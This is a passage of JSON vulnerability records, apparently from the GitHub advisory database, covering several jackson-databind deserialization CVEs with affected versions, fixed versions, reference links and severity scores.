"2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-cf6r-3wgc-h863/GHSA-cf6r-3wgc-h863.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-cf6r-3wgc-h863/GHSA-cf6r-3wgc-h863.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14892" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2462" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/819cdbcab51c6da9fb896380f2d46e9b7d4fdc3b" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0729" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200904-0005" } ], "database_specific": { "cwe_ids": [ "CWE-200", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-23T19:29:41Z", "nvd_published_at": "2020-03-02T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cggj-fvv3-cqwv", "published": "2018-10-16T17:45:18Z", "modified": "2024-03-15T01:18:46.938616Z", "aliases": [ "CVE-2018-7489" ], "summary": "FasterXML jackson-databind allows unauthenticated remote code execution ", "details": "FasterXML jackson-databind before before 2.6.7.5, 2.7.x before 2.7.9.3, 2.8.x before 2.8.11.1, and 2.9.x before 2.9.5 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the c3p0 libraries are available in the classpath.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.1" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-cggj-fvv3-cqwv/GHSA-cggj-fvv3-cqwv.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.5" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-cggj-fvv3-cqwv/GHSA-cggj-fvv3-cqwv.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.3" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-cggj-fvv3-cqwv/GHSA-cggj-fvv3-cqwv.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-cggj-fvv3-cqwv/GHSA-cggj-fvv3-cqwv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-7489" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/1931" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/e66c0a9d3c926ff1b63bf586c824ead1d02f2a3d" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/ca2bfc86af82a1479112004b663ba74c760752e6" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/c921f0935d5e41bf206e702d8077a275ba1a6efc" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/bc22f90eb7f896ace9567598a99cb1ff6e0f9d9d" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4190" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbhf03902en_us" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180328-0001" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-cggj-fvv3-cqwv" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2939" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2938" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2090" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2089" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2088" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1786" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1451" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1450" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1449" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1448" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1447" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" } ], "database_specific": { "cwe_ids": [ "CWE-184", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:31:30Z", "nvd_published_at": "2018-02-26T15:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cjjf-94ff-43w7", "published": "2019-03-25T18:03:09Z", "modified": "2024-03-11T05:19:23.395848Z", "aliases": [ "CVE-2018-12022" ], "summary": "jackson-databind Deserialization of Untrusted Data vulnerability", "details": "An issue was discovered in FasterXML jackson-databind prior to 2.7.9.4, 2.8.11.2, and 2.9.6. When Default Typing is enabled (either globally or for a specific property), the service has the Jodd-db jar (for database access for the Jodd framework) in the classpath, and an attacker can provide an LDAP service to access, it is possible to make the service execute a malicious payload.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.9.4" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-cjjf-94ff-43w7/GHSA-cjjf-94ff-43w7.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.2" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-cjjf-94ff-43w7/GHSA-cjjf-94ff-43w7.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.6" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-cjjf-94ff-43w7/GHSA-cjjf-94ff-43w7.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12022" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2052" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/bf261d404c2f79fd3406237710d40ebb03c99d84" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-cjjf-94ff-43w7" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/7fcf88aff0d1deaa5c3c7be8d58c05ad7ad5da94b59065d8e7c50c5d@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZEDLDUYBSTDY4GWDBUXGJNS2RFYTFVRC" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:0959" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0877" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1106" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1107" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1108" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1797" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1671098" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/107585" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:42:00Z", "nvd_published_at": "2019-03-21T16:00:12Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cmfg-87vq-g5g4", "published": "2019-07-17T15:26:12Z", "modified": "2024-03-15T01:18:17.903231Z", "aliases": [ "CVE-2019-12814" ], "summary": "Deserialization of untrusted data in FasterXML jackson-databind", "details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.9.1" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-cmfg-87vq-g5g4/GHSA-cmfg-87vq-g5g4.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.4" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-cmfg-87vq-g5g4/GHSA-cmfg-87vq-g5g4.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.6" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-cmfg-87vq-g5g4/GHSA-cmfg-87vq-g5g4.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-cmfg-87vq-g5g4/GHSA-cmfg-87vq-g5g4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12814" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2341" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ee0a051428d2c719acfa297d0854a189ea5e284ef3ed491fa672f4be@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e0733058c0366b703e6757d8d2a7a04b943581f659e9c271f0841dfe@%3Cnotifications.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bf20574dbc2db255f1fd489942b5720f675e32a2c4f44eb6a36060cd@%3Ccommits.accumulo.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b148fa2e9ef468c4de00de255dd728b74e2a97d935f8ced31eb41ba2@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0a2b2cca072650dbd5882719976c3d353972c44f6736ddf0ba95209@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a78239b1f11cddfa86e4edee19064c40b6272214630bfef070c37957@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a62aa2706105d68f1c02023fe24aaa3c13b4d8a1826181fed07d9682@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a3ae8a8c5e32c413cd27071d3a204166050bf79ce7f1299f6866338f@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/940b4c3fef002461b89a050935337056d4a036a65ef68e0bbd4621ef@%3Cdev.struts.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8fe2983f6d9fee0aa737e4bd24483f8f5cf9b938b9adad0c4e79b2a4@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/87e46591de8925f719664a845572d184027258c5a7af0a471b53c77b@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/71f9ffd92410a889e27b95a219eaa843fd820f8550898633d85d4ea3@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eff7280055fc717ea8129cd28a9dd57b8446d00b36260c1caee10b87@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OVRZDN2T6AZ6DJCZJ3VSIQIVHBVMVWBL" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXRVXNRFHJSQWFHPRJQRI5UPMZ63B544" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UKUALE2TUCKEKOHE2D342PQXN4MWCSLC" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190625-0006" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2935" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2936" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2937" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2938" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3044" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3045" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3046" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3050" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3200" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3292" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3297" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0d4b630d9ee724aee50703397d9d1afa2b2befc9395ba7797d0ccea9@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/129da0204c876f746636018751a086cc581e0e07bcdeb3ee22ff5731@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/15a55e1d837fa686db493137cc0330c7ee1089ed9a9eea7ae7151ef1@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1e04d9381c801b31ab28dec813c31c304b2a596b2a3707fa5462c5c0@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/28be28ffd6471d230943a255c36fe196a54ef5afc494a4781d16e37c@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2d2a76440becb610b9a9cb49b15eac3934b02c2dbcaacde1000353e4@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2ff264b6a94c5363a35c4c88fa93216f60ec54d1d973ed6b76a9f560@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/34717424b4d08b74f65c09a083d6dd1cb0763f37a15d6de135998c1d@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3f99ae8dcdbd69438cb733d745ee3ad5e852068490719a66509b4592@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", 